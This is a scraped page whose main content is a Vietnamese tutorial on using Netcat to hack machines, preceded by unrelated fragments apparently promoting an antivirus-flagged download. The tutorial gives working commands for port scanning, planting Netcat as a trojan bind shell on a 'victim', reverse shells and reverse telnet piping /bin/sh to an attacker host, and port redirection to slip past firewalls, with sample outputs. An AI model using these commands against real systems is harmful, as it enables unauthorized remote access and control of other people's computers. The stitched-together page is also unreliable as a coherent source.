- [FUNC] Better garbage collector

---

* : Fynlosky is the funny name given by Antivirus.
<3 u all !








For More INFO : Pastebin
Download :

Xem Thêm

 

Hướng dẫn sử dụng Netcat

Hướng dẫn sử dụng Netcat 
1. Giới thiệu 
Netcat là một công cụ không thể thiếu được nếu bạn muốn hack một website nào đó. Vì vậy bạn cần biết một chút về Netcatsmilie 
-------------------------------------------------------------------------------- 

2. Biên dịch 
Đối với bản Netcat cho Linux, bạn phải biên dịch nó trước khi sử dụng. 

- hiệu chỉnh file netcat.c bằng vi: vi netcat.c 
+ tìm dòng res_init(); trong main() và thêm vào trước 2 dấu "/": // res_init(); 
+ thêm 2 dòng sau vào phần #define (nằm ở đầu file): 
#define GAPING_SECURITY_HOLE 
#define TELNET 
- biên dịch: make linux 
- chạy thử: ./nc -h 
- nếu bạn muốn chạy Netcat bằng nc thay cho ./nc, bạn chỉ cần hiệu chỉnh lại biến môi trường PATH trong file ~/.bashrc, thêm vào ":." 
PATH=/sbin:/usr/sbin:...:. 

Bản Netcat cho Win không cần phải compile vì đã có sẵn file nhị phân nc.exe. Chỉ vậy giải nén và chạy là xong. 


-------------------------------------------------------------------------------- 

3. Các tùy chọn của Netcat 
Netcat chạy ở chế độ dòng lệnh. Bạn chạy nc -h để biết các tham số: 

C:\>nc -h 
connect to somewhere: nc [-options] hostname port[s] [ports] ... 
listen for inbound: nc -l -p port [options] [hostname] [port] 
options: 
-d detach from console, stealth mode 

-e prog inbound program to exec [dangerous!!] 
-g gateway source-routing hop point[s], up to 8 
-G num source-routing pointer: 4, 8, 12, ... 
-h this cruft 
-i secs delay interval for lines sent, ports scanned 
-l listen mode, for inbound connects 
-L listen harder, re-listen on socket close 
-n numeric-only IP addresses, no DNS 
-o file hex dump of traffic 
-p port local port number 
-r randomize local and remote ports 
-s addr local source address 
-t answer TELNET negotiation 
-u UDP mode 
-v verbose [use twice to be more verbose] 
-w secs timeout for connects and final net reads 
-z zero-I/O mode [used for scanning] 
port numbers can be individual or ranges: m-n [inclusive] 


* Cú pháp: 

- chế độ kết nối : nc [-tùy_chọn] tên_máy cổng1[-cổng2] 
- chế độ lắng nghe: nc -l -p cổng [-tùy_chọn] [tên_máy] [cổng] 

* Một số tùy chọn: 

-d tách Netcat khỏi cửa sổ lệnh hay là console, Netcat sẽ chạy ở chế độ steath(không hiển thị trên thanh Taskbar) 
-e prog thi hành chương trình prog, thường dùng trong chế độ lắng nghe 
-h gọi hướng dẫn 
-i secs trì hoãn secs mili giây trước khi gởi một dòng dữ liệu đi 
-l đặt Netcat vào chế độ lắng nghe để chờ các kết nối đến 
-L buộc Netcat "cố" lắng nghe. Nó sẽ lắng nghe trở lại sau mỗi khi ngắt một kết nối. 
-n chỉ dùng địa chỉ IP ở dạng số, chẳng hạn như 192.168.16.7, Netcat sẽ không thẩm vấn DNS 
-o file ghi nhật kí vào file 
-p port chỉ định cổng port 
-r yêu cầu Netcat chọn cổng ngẫu nhiên(random) 
-s addr giả mạo địa chỉ IP nguồn là addr 
-t không gởi các thông tin phụ đi trong một phiên telnet. Khi bạn telnet đến một telnet daemon(telnetd), telnetd thường yêu cầu trình telnet client của bạn gởi đến các thông tin phụ như biến môi trường TERM, USER. Nếu bạn sử dụng netcat với tùy chọn -t để telnet, netcat sẽ không gởi các thông tin này đến telnetd. 
-u dùng UDP(mặc định netcat dùng TCP) 
-v hiển thị chi tiết các thông tin về kết nối hiện tại. -vv sẽ hiển thị thông tin chi tiết hơn nữa. 
-w secs đặt thời gian timeout cho mỗi kết nối là secs mili giây 
-z chế độ zero I/O, thường được sử dụng khi scan port 

Netcat hổ trợ phạm vi cho số hiệu cổng. Cú pháp là cổng1-cổng2. Ví dụ: 1-8080 nghĩa là 1,2,3,..,8080 


-------------------------------------------------------------------------------- 

4. Các ví dụ: 
4.1 Chộp banner của web server 
Ví dụ: nc đến 172.16.84.2, cổng 80 

C:\>nc 172.16.84.2 80 
HEAD / HTTP/1.0 (tại đây bạn gõ Enter 2 lần) 

HTTP/1.1 200 OK 
Date: Sat, 05 Feb 2000 20:51:37 GMT 
Server: Apache-AdvancedExtranetServer/1.3.19 (Linux-Mandrake/3mdk) mod_ssl/2.8.2 
OpenSSL/0.9.6 PHP/4.0.4pl1 
Connection: close 
Content-Type: text/html 


Để biết thông tin chi tiết về kết nối, bạn có thể dùng -v(-vv sẽ cho biết các thông tin chi tiết hơn nữa) 

C:\>nc -vv 172.16.84.1 80 
172.16.84.1: inverse host lookup failed: h_errno 11004: NO_DATA 
(UNKNOWN) [172.16.84.1] 80 (?) open 
HEAD / HTTP/1.0 

HTTP/1.1 200 OK 
Date: Fri, 04 Feb 2000 14:46:43 GMT 
Server: Apache/1.3.20 (Win32) 
Last-Modified: Thu, 03 Feb 2000 20:54:02 GMT 
ETag: "0-cec-3899eaea" 
Accept-Ranges: bytes 
Content-Length: 3308 
Connection: close 
Content-Type: text/html 

sent 17, rcvd 245: NOTSOCK 


Nếu muốn ghi nhật kí, hãy dùng -o <tên_file>. Ví dụ: 

nc -vv -o nhat_ki.log 172.16.84.2 80 


- xem file nhat_ki.log 

< 00000000 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d # HTTP/1.1 200 OK. 
< 00000010 0a 44 61 74 65 3a 20 46 72 69 2c 20 30 34 20 46 # .Date: Fri, 04 F 
< 00000020 65 62 20 32 30 30 30 20 31 34 3a 35 30 3a 35 34 # eb 2000 14:50:54 
< 00000030 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 # GMT..Server: Ap 
< 00000040 61 63 68 65 2f 31 2e 33 2e 32 30 20 28 57 69 6e # ache/1.3.20 (Win 
< 00000050 33 32 29 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 # 32)..Last-Modifi 
< 00000060 65 64 3a 20 54 68 75 2c 20 30 33 20 46 65 62 20 # ed: Thu, 03 Feb 
< 00000070 32 30 30 30 20 32 30 3a 35 34 3a 30 32 20 47 4d # 2000 20:54:02 GM 
< 00000080 54 0d 0a 45 54 61 67 3a 20 22 30 2d 63 65 63 2d # T..ETag: "0-cec- 
< 00000090 33 38 39 39 65 61 65 61 22 0d 0a 41 63 63 65 70 # 3899eaea"..Accep 
< 000000a0 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d # t-Ranges: bytes. 
< 000000b0 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a # .Content-Length: 
< 000000c0 20 33 33 30 38 0d 0a 43 6f 6e 6e 65 63 74 69 6f # 3308..Connectio 
< 000000d0 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e # n: close..Conten 
< 000000e0 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d # t-Type: text/htm 
< 000000f0 6c 0d 0a 0d 0a # l.... 

dấu < nghĩa là server gởi đến netcat 
dấu > nghĩa là netcat gởi đến server 

4.2 Quét cổng 
- chạy netcat với tùy chọn -z. Để quét cổng nhanh hơn, hãy dùng -n vì netcat sẽ không cần thấm vấn DNS. Ví dụ để scan các cổng TCP(1->500) của host 172.16.106.1 

[dt@vicki /]# nc -nvv -z 172.16.106.1 1-500 
(UNKNOWN) [172.16.106.1] 443 (?) open 
(UNKNOWN) [172.16.106.1] 139 (?) open 
(UNKNOWN) [172.16.106.1] 111 (?) open 
(UNKNOWN) [172.16.106.1] 80 (?) open 
(UNKNOWN) [172.16.106.1] 23 (?) open 


- nếu bạn cần scan các cổng UDP, dùng -u 

[dt@vicki /]# nc -u -nvv -z 172.16.106.1 1-500 
(UNKNOWN) [172.16.106.1] 1025 (?) open 
(UNKNOWN) [172.16.106.1] 1024 (?) open 
(UNKNOWN) [172.16.106.1] 138 (?) open 
(UNKNOWN) [172.16.106.1] 137 (?) open 
(UNKNOWN) [172.16.106.1] 123 (?) open 
(UNKNOWN) [172.16.106.1] 111 (?) open 


4.3 Biến Netcat thành một trojan 
- trên máy tính của nạn nhân, bạn khởi động netcat vào chế độ lắng nghe, dùng tùy chọn -l(listen) và -p port để xác định số hiệu cổng cần lắng nghe, -e <tên_chương_trình_cần_chạy> để yêu cầu netcat thi hành 1 chương trình khi có 1 kết nối đến, thường là shell lệnh cmd.exe(đối với NT) hoặc /bin/sh(đối với Unix). Ví dụ: 

E:\>nc -nvv -l -p 8080 -e cmd.exe 
listening on [any] 8080 ... 
connect to [172.16.84.1] from (UNKNOWN) [172.16.84.1] 3159 
sent 0, rcvd 0: unknown socket error 


- trên máy tính dùng để tấn công, bạn chỉ việc dùng netcat nối đến máy nạn nhân trên cổng đã định, chẳng hạn như 8080 

C:\>nc -nvv 172.16.84.2 8080 
(UNKNOWN) [172.16.84.2] 8080 (?) open 
Microsoft Windows 2000 [Version 5.00.2195] 
(C) Copyright 1985-1999 Microsoft Corp. 

E:\>cd test 
cd test 

E:\test>dir /w 
dir /w 
Volume in drive E has no label. 
Volume Serial Number is B465-452F 

Directory of E:\test 

[.] [..] head.log NETUSERS.EXE NetView.exe 
ntcrash.zip password.txt pwdump.exe 
6 File(s) 262,499 bytes 
2 Dir(s) 191,488,000 bytes free 

C:\test>exit 
exit 
sent 20, rcvd 450: NOTSOCK 


Như bạn thấy, chúng ta đã có thể làm gì mà chẳng được với máy của nạn nhân qua shell lệnh này?! Tuy nhiên, sau kết nối trên, netcat trên máy nạn nhân cũng đóng luôn. Để yêu cầu netcat lắng nghe trở lại sau mỗi kết nối, bạn dùng -L thay cho -l. Lưu ý: -L chỉ có thể áp dụng cho bản Netcat for Windows, không áp dụng cho bản chạy trên Linux. 

E:\>nc -nvv -L -p 8080 -e cmd.exe 
listening on [any] 8080 ... 


- Riêng đối với Netcat cho Win, bạn có thể lắng nghe ngay trên cổng đang lắng nghe. Chỉ cần chỉ định địa chỉ nguồn là -s <địa_chỉ_ip_của_máy_này>. Ví dụ: 

netstat -a 
... 
TCP nan_nhan:domain nan_nhan:0 LISTENING <- cổng 53 đang lắng nghe 
... 

E:\>nc -nvv -L -e cmd.exe -s 172.16.84.1 -p 53 -> lắng nghe ngay trên cổng 53 
listening on [172.16.84.1] 53 ... 
connect to [172.16.84.1] from (UNKNOWN) [172.16.84.1] 3163 


- Trên Windows NT, để đặt Netcat ở chế độ lắng nghe, không cần phải có quyền Administrator, chỉ cần login vào với 1 username bình thường khởi động Netcat là xong. 

- Chú ý: bạn không thể chạy netcat với ... -u -e cmd.exe... hoặc ...-u -e /bin/sh... vì netcat sẽ không làm việc đúng. Nếu bạn muốn có một UDP shell trên Unix, hãy dùng udpshell thay cho netcat. 


-------------------------------------------------------------------------------- 

5. Kĩ thuật tiên tiến 
5.1 Telnet nghịch chuuyển 
- dùng telnet để nối cửa số netcat đang lắng nghe, kế đó đưa lệnh từ cửa sổ này vào luồng telnet nghịch chuyển, và gởi kết quả vào cửa sổ kia. Ví dụ: 

- trên máy dùng để tấn công(172.16.84.1), mở 2 cửa sổ netcat lần lượt lắng nghe trên cổng 80 và 25: 

+ cửa sổ Netcat (1) 

C:\>nc -nvv -l -p 80 
listennng on [any] 80 ... 
connect to [172.16.84.1] from <UNKNOWN> [172.16.84.2] 1055 
pwd 
ls -la 



+ cửa sổ Netcat (2) 

C:\>nc -nvv -l -p 25 
listening on [any] 25 ... 
connect to [172.16.84.1] from (UNKNOWN) [172.16.84.2] 1056 

total 171 
drwxr-xr-x 17 root root 4096 Feb 5 16:15 . 
drwxr-xr-x 17 root root 4096 Feb 5 16:15 .. 
drwxr-xr-x 2 root root 4096 Feb 5 08:55 b ( ²?n 
drwxr-xr-x 3 root root 4096 Feb 5 14:19 boot 
drwxr-xr-x 13 root root 106496 Feb 5 14:18 dev 
drwxr-xr-x 37 root root 4096 Feb 5 14:23 et = ²? 
drwxr-xr-x 6 root root 4096 Feb 5 08:58 home 
drwxr-xr-x 6 root root 4096 Feb 5 08:50 l ( ²?b 
drwxr-xr-x 2 root root 7168 De = ²? 31 1969 mnt 
drwxr-xr-x 4 root root 4096 Feb 5 16:18 n = ²? 
drwxr-xr-x 2 root root 4096 Aug 23 12:03 opt 
dr-xr-xr-x 61 root root 0 Feb 5 09:18 pro = ²? 
drwx------ 12 root root 4096 Feb 5 16:24 root 
drwxr-xr-x 2 root root 4096 Feb 5 08:55 sb ( ²?n 
drwxrwxrwt 9 root root 4096 Feb 5 16:25 tmp 
drwxr-xr-x 13 root root 4096 Feb 5 08:42 usr 
drwxr-xr-x 18 root root 4096 Feb 5 08:52 var 


- trên máy tính nạn nhân(172.16.84.2), telnet nghịch chuyển đến máy dùng để tấn công(172.16.84.1), dùng /bin/sh để kết xuất: 

[root@nan_nhan /]# telnet 172.16.84.1 80 | /bin/sh | telnet 172.16.84.1 25 
/bin/sh: Trying: command not found 
/bin/sh: Connected: command not found 
/bin/sh: Escape: command not found 
Trying 172.16.84.1... 
Connected to 172.16.84.1. 
Escape character is '^]'. 



Telnet trên máy nạn nhân sẽ chuyển tất cả những gì mà chúng ta gõ vào trong cửa sổ Netcat (1) - cổng 80 kết xuất sang cho /bin/sh thi hành. Kết quả của /bin/sh được kết xuất trở lại cho máy tính dùng để tấn công trên cửa sổ Netcat (2) - cổng 25. Nhiệm vụ của bạn là chỉ cần gõ lệnh vào cửa sổ Netcat (1) và xem kết quả trong cửa sổ Netcat (2). 

Sở dĩ tôi chọn cổng 80 và 25 vì các cổng này thường không bị firewalls hoặc filters lọc. 

5.2 Tạo kênh sau 
Cũng tương tự như telnet nghịch chuyển. 

- trên máy tính dùng để tấn công, bạn đặt Netcat lắng nghe trên cổng 80 vì cổng này sẽ không bị firewall chặn: 

C:\>nc -nvv -l -p 80 
listennng on [any] 80 ... 


- tiếp theo, từ shell lệnh của máy nạn nhân, bạn nối Netcat đến máy dùng để tấn công với tùy chọn -e để đổ shell: 

E:\>nc -e cmd.exe 172.16.84.1 80 


Một khi máy nạn nhân thi hành chuổi lệnh trên, kênh sau nc sẽ được tạo, "nhét" shell (trong trường hợp này là cmd.exe) trở vào nc. Kể từ đây, chúng ta đã có 1 shell lệnh ảo. 

C:\>nc -nvv -l -p 80 
listenning pm [any] 80 ... 
connect to [172.16.84.1] from [UNKNOWN] [172.16.84.3] 1035 

Microsoft Windows 2000 [Version 5.00.2195] 
(C) Copyright 1985-1999 Microsoft Corp. 

E:\> 


5.3 Đổi hướng cổng 
Bạn có thể dùng tunnel.pl hoặc fpipe.exe. Hãy xem ví dụ sau: 

- chạy nc trên cổng bất kì: 

E:\>nc -nvv -L -p 1234 -e cmd.exe 
listening on [any] 1234 ... 


- chạy tunnel hoặc fpipe để đổi hướng cổng 

C:\>perl tunnel.pl --port=53 --tohost=127.0.0.1 --toport=1234 


C:\>fpipe -l 53 -r 1234 127.0.0.1 


tunnel, fpipe sẽ lắng nghe trên cổng 53, sau đó chuyển tiếp kết nối đến 127.0.0.1:1024, đây là cổng mà netcat đang lắng nghe. 

Đổi hướng cổng là một cách để đi vòng qua firewalls. 
-------------------------------------------------------------------------------- 


http://www.hvaonline.net/hvaonline/posts/list/157.hva

Xem Thêm